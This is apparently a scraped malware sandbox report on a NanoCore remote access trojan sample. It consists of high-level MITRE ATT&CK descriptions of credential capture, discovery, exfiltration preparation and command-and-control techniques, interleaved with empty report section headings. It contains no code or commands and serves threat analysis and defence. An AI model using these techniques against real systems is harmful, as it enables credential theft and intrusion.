Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report e5bd3238d220c97cd4d6969abb3b33e0

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Static AutoIT Info

General

Network Behavior

Network Port Distribution

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre